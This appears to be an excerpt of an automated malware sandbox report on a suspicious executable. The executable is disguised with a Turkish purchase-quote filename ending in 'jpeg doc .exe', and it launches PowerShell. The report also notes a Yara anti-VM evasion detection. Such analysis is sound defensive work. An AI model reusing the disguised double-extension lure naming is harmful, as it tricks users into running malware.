Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

